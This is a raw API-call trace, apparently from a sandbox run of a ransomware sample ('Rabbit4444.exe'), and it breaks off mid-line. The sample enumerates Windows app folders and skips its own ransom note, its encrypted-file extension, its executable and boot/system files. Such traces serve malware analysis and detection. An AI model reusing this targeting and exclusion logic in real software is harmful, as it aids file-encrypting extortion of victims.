[0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2=".") returned 1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="..") returned 1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.843] lstrcpyW (in: lpString1=0x130eb86, lpString2="DesktopLearning_cw5n1h2txyewy" | out: lpString1="DesktopLearning_cw5n1h2txyewy") returned="DesktopLearning_cw5n1h2txyewy" [0055.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0055.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11f350 [0055.843] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6510 [0055.843] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80cf63bf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x80d4289c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x80d4289c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DesktopView_cw5n1h2txyewy", cAlternateFileName="DESKTO~1")) returned 1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2=".") returned 1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="..") returned 1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.843] lstrcmpiW (lpString1="DesktopView_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.843] lstrcpyW (in: lpString1=0x130eb86, lpString2="DesktopView_cw5n1h2txyewy" | out: lpString1="DesktopView_cw5n1h2txyewy") returned="DesktopView_cw5n1h2txyewy" [0055.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0055.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x82) returned 0x105b20 [0055.843] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6530 [0055.843] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x79ed145d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x79f1d90f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x79f1d90f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", cAlternateFileName="E2A4F9~1")) returned 1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2=".") returned 1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="..") returned 1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.843] lstrcmpiW (lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.843] lstrcpyW (in: lpString1=0x130eb86, lpString2="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy" | out: lpString1="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy") returned="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy" [0055.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0055.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0xef950 [0055.843] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6930 | out: ListHead=0xf68b0, ListEntry=0xf6930) returned 0xf6590 [0055.843] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c412157, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7c48483f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7c48483f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EnvironmentsApp_cw5n1h2txyewy", cAlternateFileName="ENVIRO~1")) returned 1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2=".") returned 1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="..") returned 1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.844] lstrcmpiW (lpString1="EnvironmentsApp_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.844] lstrcpyW (in: lpString1=0x130eb86, lpString2="EnvironmentsApp_cw5n1h2txyewy" | out: lpString1="EnvironmentsApp_cw5n1h2txyewy") returned="EnvironmentsApp_cw5n1h2txyewy" [0055.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0055.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11e478 [0055.844] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0055.844] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7db9d550, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7dbe9a15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7dbe9a15, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HoloCamera_cw5n1h2txyewy", cAlternateFileName="HOLOCA~1")) returned 1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2=".") returned 1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="..") returned 1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.844] lstrcmpiW (lpString1="HoloCamera_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.844] lstrcpyW (in: lpString1=0x130eb86, lpString2="HoloCamera_cw5n1h2txyewy" | out: lpString1="HoloCamera_cw5n1h2txyewy") returned="HoloCamera_cw5n1h2txyewy" [0055.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d300 [0055.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x80) returned 0x101f30 [0055.844] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d308 | out: ListHead=0xf68b0, ListEntry=0x11d308) returned 0xea710 [0055.844] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e441dff, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7e48e2a2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7e48e2a2, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HoloItemPlayerApp_cw5n1h2txyewy", cAlternateFileName="HOLOIT~1")) returned 1 [0055.844] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.844] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2=".") returned 1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="..") returned 1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.845] lstrcmpiW (lpString1="HoloItemPlayerApp_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.845] lstrcpyW (in: lpString1=0x130eb86, lpString2="HoloItemPlayerApp_cw5n1h2txyewy" | out: lpString1="HoloItemPlayerApp_cw5n1h2txyewy") returned="HoloItemPlayerApp_cw5n1h2txyewy" [0055.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d440 [0055.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11e808 [0055.845] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d448 | out: ListHead=0xf68b0, ListEntry=0x11d448) returned 0x11d308 [0055.845] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ed0c8e8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7ed0c8e8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7ed0c8e8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HoloShell_cw5n1h2txyewy", cAlternateFileName="HOLOSH~1")) returned 1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2=".") returned 1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="..") returned 1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.845] lstrcmpiW (lpString1="HoloShell_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.845] lstrcpyW (in: lpString1=0x130eb86, lpString2="HoloShell_cw5n1h2txyewy" | out: lpString1="HoloShell_cw5n1h2txyewy") returned="HoloShell_cw5n1h2txyewy" [0055.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d120 [0055.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7e) returned 0x101a68 [0055.845] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d128 | out: ListHead=0xf68b0, ListEntry=0x11d128) returned 0x11d448 [0055.845] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50830815, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x12383999, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x12383999, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.3DBuilder_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.3DB")) returned 1 [0055.845] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.845] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.845] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.845] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.845] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.845] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.846] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.3DBuilder_8wekyb3d8bbwe" | out: lpString1="Microsoft.3DBuilder_8wekyb3d8bbwe") returned="Microsoft.3DBuilder_8wekyb3d8bbwe" [0055.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d320 [0055.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x1135f8 [0055.846] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d328 | out: ListHead=0xf68b0, ListEntry=0x11d328) returned 0x11d128 [0055.846] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a89eb27, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4609348, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd4609348, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", cAlternateFileName="MICROS~1.BRO")) returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2=".") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="..") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.846] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy" | out: lpString1="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy") returned="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy" [0055.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d140 [0055.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0xf11e8 [0055.846] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d148 | out: ListHead=0xf68b0, ListEntry=0x11d148) returned 0x11d328 [0055.846] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x627e1477, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x802f4316, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x80471ab5, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.AccountsControl_cw5n1h2txyewy", cAlternateFileName="MICROS~1.ACC")) returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2=".") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="..") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.846] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.AccountsControl_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.847] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.AccountsControl_cw5n1h2txyewy" | out: lpString1="Microsoft.AccountsControl_cw5n1h2txyewy") returned="Microsoft.AccountsControl_cw5n1h2txyewy" [0055.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d340 [0055.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0xefd18 [0055.847] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d348 | out: ListHead=0xf68b0, ListEntry=0x11d348) returned 0x11d148 [0055.847] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda8902b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xda94ee85, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xda94ee85, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.XAM")) returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.847] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Advertising.Xaml_8wekyb3d8bbwe" | out: lpString1="Microsoft.Advertising.Xaml_8wekyb3d8bbwe") returned="Microsoft.Advertising.Xaml_8wekyb3d8bbwe" [0055.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d360 [0055.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0xf1e00 [0055.847] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d368 | out: ListHead=0xf68b0, ListEntry=0x11d368) returned 0x11d348 [0055.847] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cf90959, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfafb82b, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xfafb82b, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Appconnector_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.APP")) returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.847] lstrcmpiW (lpString1="Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.847] lstrcmpiW 